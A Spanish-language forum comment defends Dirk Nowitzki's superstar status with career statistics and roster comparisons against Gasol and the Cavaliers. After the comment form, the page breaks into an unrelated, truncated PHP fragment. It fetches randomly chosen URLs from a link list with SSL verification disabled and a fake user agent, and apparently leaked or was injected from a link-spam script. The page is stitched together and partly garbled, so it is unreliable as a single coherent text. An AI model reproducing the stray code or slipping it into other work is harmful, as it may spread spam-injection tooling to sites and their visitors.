    La comparación con Nowitzki sinceramente me la trae al fresco. Nowitzki lleva 8 años siendo All-Star, ha estado 4 veces en el quinteto ideal estando Tim Duncan y Kevin Garnett en la liga, ha ganado un MVP merecidísimo, ha metido a Dallas durante 9 años consecutivos en play-offs con el Oeste mas salvaje de la historia y en una final de la NBA ganando contra San Antonio el 7º partido en el Alamo, una final perdida desde el banquillo sin ninguna duda. Ese es Nowitzki, y a Gasol le queda muy lejos todo eso.

    En cuanto a la plantilla de Dallas, Kidd tiene 36 años, Howard se perdió 30 partidos el año pasado y tiene problemas de indisciplina, Marion promedió en la 08-09 los mismos números que Ilgauskas aunque en muchos mas minutos de juego, Gooden fue compañero de Lebron y Dampier es malísimo, seguro que Lebron lo cambiaba por Shaq, y a Terry puedes compararlo con Mo Williams. No creo que los Cavs cambien a Mo Williams, Delonte West y Varejao por Kidd, quien sea el escolta titular de Dallas y Gooden.

    Pero bueno, siempre podemos decir que un tio no es una superestrella, aunque sus números en los últimos 8 años sean de 24.6 puntos, 9.1 rebotes, 3 asistencias, siempre mas de un 46% en tiros de campo y un 38% de media en triples. Si hace todo eso y además es el único jugador de la historia que anota 100 triples y pone 100 tapones está claro que no es una superestrella.

    Y para acabar, no recuerdo al último campeón de la NBA que no tuviese al menos a 2 All-Stars en sus filas, pero si puedo decirte que Nowitzki se pasó por la piedra a toda la conferencia Oeste sin un All-Star a su lado, cuando Phoenix, San Antonio y Houston si contaban con 2 estrellas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>